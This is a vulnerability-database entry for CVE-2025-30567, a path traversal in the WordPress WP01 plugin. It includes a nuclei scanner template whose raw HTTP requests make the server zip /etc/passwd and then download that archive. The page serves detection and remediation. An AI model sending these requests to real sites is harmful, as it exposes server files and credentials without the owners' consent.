Lucene search
K

WordPress WP01 - Path Traversal

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 62 Views

High severity Path Traversal vulnerability in WordPress WP01, affecting versions up to 2.6.2.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2025-30567
25 Mar 202519:24
circl
CNNVD
WordPress plugin WP01 路径遍历漏洞
25 Mar 202500:00
cnnvd
CVE
CVE-2025-30567
25 Mar 202518:48
cve
Cvelist
CVE-2025-30567 WordPress WP01 plugin <= 2.6.2 - Arbitrary File Download Vulnerability
25 Mar 202518:48
cvelist
NVD
CVE-2025-30567
25 Mar 202519:15
nvd
Patchstack
WordPress WP01 plugin <= 2.6.2 - Arbitrary File Download Vulnerability
25 Mar 202518:40
patchstack
Positive Technologies
PT-2025-12817 · Wp01 · Wp01
25 Mar 202500:00
ptsecurity
RedhatCVE
CVE-2025-30567
27 Mar 202519:40
redhatcve
VulnCheck KEV
VulnCheck KEV: CVE-2025-30567
16 Jul 202500:00
vulncheck_kev
Vulnrichment
CVE-2025-30567 WordPress WP01 plugin <= 2.6.2 - Arbitrary File Download Vulnerability
25 Mar 202518:48
vulnrichment
Rows per page
id: CVE-2025-30567

info:
  name: WordPress WP01 - Path Traversal
  author: s4e-io
  severity: high
  description: |
    Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in wp01ru WP01 allows Path Traversal. This issue affects WP01: from n/a through 2.6.2.
  impact: |
    Unauthenticated attackers can exploit path traversal to download arbitrary files from the server as ZIP archives, potentially exposing sensitive configuration files and credentials.
  remediation: |
    Upgrade to WP01 version 2.6.3 or later that properly validates file paths in the generate ZIP archive functionality.
  reference:
    - https://github.com/Oyst3r1ng/CVE-2025-30567
    - https://patchstack.com/database/wordpress/plugin/wp01/vulnerability/wordpress-wp01-2-6-2-arbitrary-file-download-vulnerability?_s_id=cve
    - https://nvd.nist.gov/vuln/detail/CVE-2025-30567
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2025-30567
    cwe-id: CWE-22
    epss-score: 0.02628
    epss-percentile: 0.83649
  metadata:
    verified: true
    max-request: 2
    vendor: wp01ru
    product: wp01
    framework: wordpress
  tags: cve,cve2025,lfi,wp-plugin,wordpress,wp01,wp,vkev,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php?action=wp01_generate_zip_archive HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        target=passwd&path=/etc/

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "wp-01-passwd.zip")'
          - 'contains(content_type, "application/json")'
          - 'status_code == 200'
        condition: and
        internal: true

  - raw:
      - |
        GET /wp-content/wp01-backup/wp-01-passwd.zip HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(content_type, "application/zip")'
          - 'status_code == 200'
        condition: and
# digest: 4b0a00483046022100aecce217ba04e97f656e7c40dd806c919d810a88768720ea1f1a5dd58bb909df022100c2b338ef560157f726438472a9d6b9e07280014ee08f83afced24c31a3137067:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
5.9Medium risk
Vulners AI Score5.9
CVSS 3.17.5
EPSS0.02628
SSVC
62